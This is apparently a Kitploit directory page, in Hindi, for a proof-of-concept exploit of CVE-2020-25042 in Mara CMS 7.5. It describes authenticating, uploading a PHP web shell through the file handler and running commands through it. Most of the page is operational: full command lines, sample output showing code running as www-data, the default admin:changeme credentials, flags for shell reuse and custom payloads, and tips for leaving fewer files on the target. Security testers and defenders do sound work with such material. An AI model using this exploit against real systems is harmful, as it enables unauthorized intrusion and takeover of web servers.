Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2020-25042-PoC — PoC for CVE-2020-25042: स्वचालित Mara CMS 7.5 प्रमाणित PHP अपलोड से RCE तक, लॉगिन हैश हैंडलिंग, शेल पुन: उपयोग, कस्टम पेलोड समर्थन, और स्वच्छ CLI आउटपुट के साथ। | Kitploit
उपकरण/GitHubGitHub/groppoxx/cve-2020-25042-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubgroppoxx/cve-2020-25042-poc

CVE-2020-25042-PoC

PoC for CVE-2020-25042: स्वचालित Mara CMS 7.5 प्रमाणित PHP अपलोड से RCE तक, लॉगिन हैश हैंडलिंग, शेल पुन: उपयोग, कस्टम पेलोड समर्थन, और स्वच्छ CLI आउटपुट के साथ।

रिपॉजिटरी देखें
5114 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-25042-PoC

CVE-2020-25042 के लिए प्रूफ-ऑफ-कॉन्सेप्ट, जो Mara CMS 7.5 में एक प्रमाणित (authenticated) मनमाना फ़ाइल अपलोड दोष है जो रिमोट कोड निष्पादन का कारण बन सकता है।

यह स्क्रिप्ट एक वैध Mara CMS एडमिन/मैनेजर खाते से लॉगिन करती है, codebase/handler.php के माध्यम से एक PHP पेलोड अपलोड करती है, और अपलोड की गई फ़ाइल के माध्यम से कमांड निष्पादित करती है।

यह संभव होने पर मौजूदा शेल का पुनः उपयोग भी करती है, ताकि आपको हर बार चलाने पर नई PHP फ़ाइल न बनानी पड़े।

यह क्या करती है

  1. जाँच करती है कि अपेक्षित शेल पहले से मौजूद है और पुनः उपयोग योग्य है या नहीं।
  2. यदि पुनः उपयोग योग्य है, तो सीधे कमांड निष्पादित करती है।
  3. यदि पुनः उपयोग योग्य नहीं है, तो CMS पेज लोड करती है और shash निकालती है।
  4. setsalt एक्शन के साथ लॉगिन सॉल्ट का अनुरोध करती है।
  5. Mara CMS लॉगिन हैश की गणना करती है।
  6. एक वैध उपयोगकर्ता के रूप में प्रमाणित करती है।
  7. codebase/dir.php?type=filenew पर अपलोड फ़्लो खोलती है।
  8. codebase/handler.php के माध्यम से एक PHP कमांड पेलोड अपलोड करती है।
  9. अपलोड किए गए शेल के माध्यम से --cmd निष्पादित करती है।

आवश्यकताएँ

Python 3.8+

pip install -r requirements.txt

आवश्यक Python पैकेज:

requests
urllib3

त्वरित प्रारंभ

कोण कोष्ठकों (< >) में लिपटे मान प्लेसहोल्डर हैं। उन्हें अपने स्वयं के मानों से बदलें और < या > वर्ण शामिल न करें।

python3 cve_2020_25042.py \
  --url <MARA_CMS_URL> \
  --username <USERNAME> \
  --password '<PASSWORD>' \
  --cmd whoami

प्लेसहोल्डर

<MARA_CMS_URL>  # लक्षित Mara CMS आधार URL। उदाहरण: http://target/cms
<USERNAME>      # वैध Mara CMS एडमिन/मैनेजर उपयोगकर्ता नाम।
<PASSWORD>      # वैध Mara CMS एडमिन/मैनेजर पासवर्ड।

पूर्ण उदाहरण

python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --username admin \
  --password changeme \
  --cmd whoami

उदाहरण आउटपुट:

[2026-05-17T23:32:31Z] [*] Checking existing shell: http://10.129.96.20/cms/img/mara-poc.php
[2026-05-17T23:32:31Z] [*] Loading Mara CMS page and collecting session data
[2026-05-17T23:32:31Z] [+] Found shash: 9552
[2026-05-17T23:32:31Z] [*] Requesting login salt
[2026-05-17T23:32:31Z] [+] Got salt: 4253
[2026-05-17T23:32:31Z] [*] Logging in as admin
[2026-05-17T23:32:31Z] [+] Login successful: OK:5
[2026-05-17T23:32:31Z] [*] Opening upload form
[2026-05-17T23:32:32Z] [*] Uploading PHP payload as mara-poc.php
[2026-05-17T23:32:32Z] [+] Upload request completed
[2026-05-17T23:32:32Z] [+] Shell URL: http://10.129.96.20/cms/img/mara-poc.php
[2026-05-17T23:32:32Z] [*] Executing command: whoami

[+] Command output
MARA_CVE_2020_25042_OK
www-data

मौजूदा शेल का पुनः उपयोग

डिफ़ॉल्ट रूप से, स्क्रिप्ट एक स्थिर शेल नाम का उपयोग करती है:

mara-poc.php

अगली बार चलाने पर, यह जाँच करती है:

http://target/cms/img/mara-poc.php

यदि शेल अपेक्षित मार्कर के साथ प्रतिक्रिया देता है, तो स्क्रिप्ट लॉगिन और अपलोड छोड़ देती है:

python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --cmd "ls -la"

पिछले यादृच्छिक नाम से बनाए गए शेल को पुनः उपयोग करने के लिए:

python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --shell-name mara-poc-jxfizldy.php \
  --cmd whoami

आप खुला हुआ शेल पथ सीधे भी पास कर सकते हैं:

python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --shell-url-path /cms/img/mara-poc-jxfizldy.php \
  --cmd "ls -la"

केवल अपलोड

कमांड निष्पादित किए बिना पेलोड अपलोड करें:

python3 cve_2020_25042.py \
  --url http://10.129.96.20/cms \
  --username admin \
  --password changeme \
  --upload-only

वैकल्पिक फ़्लैग

--page <PAGE>
   लॉगिन बूटस्ट्रैप करने और shash निकालने के लिए उपयोग किया जाने वाला मौजूदा CMS पेज। डिफ़ॉल्ट: lorem.php

--shell-name <NAME>
   अपलोड करने या पुनः उपयोग करने के लिए PHP फ़ाइल नाम। डिफ़ॉल्ट: mara-poc.php

--shell-url-path <PATH_OR_URL>
   पुनः उपयोग के लिए स्पष्ट शेल पथ या URL।
   उदाहरण: /cms/img/mara-poc.php

--payload-file <FILE>
   डिफ़ॉल्ट ?cmd= शेल के बजाय एक कस्टम PHP पेलोड अपलोड करें।

--destdir <DIR>
   अपलोड फ़ॉर्म में भेजा गया कच्चा destdir मान। डिफ़ॉल्ट Mara CMS को img/ उपयोग करने देता है।

--force-upload
   हमेशा लॉगिन और अपलोड करें, भले ही पुनः उपयोग योग्य शेल पहले से मौजूद हो।

--upload-only
   पेलोड अपलोड करें लेकिन --cmd निष्पादित न करें।

--only-final
   प्रगति लॉग छिपाएँ और केवल कमांड आउटपुट प्रिंट करें।

--no-color
   ANSI रंग अक्षम करें।

--debug
   अनुरोध URL और हैंडलर प्रतिक्रिया के संक्षिप्त अंश प्रिंट करें।

नोट्स

  • एक्सप्लॉइट के लिए एक वैध प्रमाणित Mara CMS एडमिन या मैनेजर सत्र आवश्यक है।
  • बिना संशोधित टेस्ट इंस्टॉलेशन पर डिफ़ॉल्ट Mara CMS क्रेडेंशियल admin:changeme हो सकते हैं।
  • डिफ़ॉल्ट पेलोड कमांड आउटपुट से पहले MARA_CVE_2020_25042_OK प्रिंट करता है।
  • Mara CMS 7.5 में देखा गया डिफ़ॉल्ट अपलोड स्थान img/ है।
  • लक्ष्य पर बहुत सारी PHP फ़ाइलें छोड़ने से बचने के लिए जब भी संभव हो शेल पुनः उपयोग का उपयोग करें।
  • --force-upload का उपयोग केवल तभी करें जब आपको पेलोड को अधिलेखित (overwrite) या पुनः बनाने की आवश्यकता हो।

कानूनी

यह PoC अधिकृत सुरक्षा परीक्षण, प्रयोगशाला वातावरण और भेद्यता सत्यापन के लिए है। बिना स्पष्ट अनुमति के इसे सिस्टम के विरुद्ध उपयोग न करें।

टूल डाउनलोड करें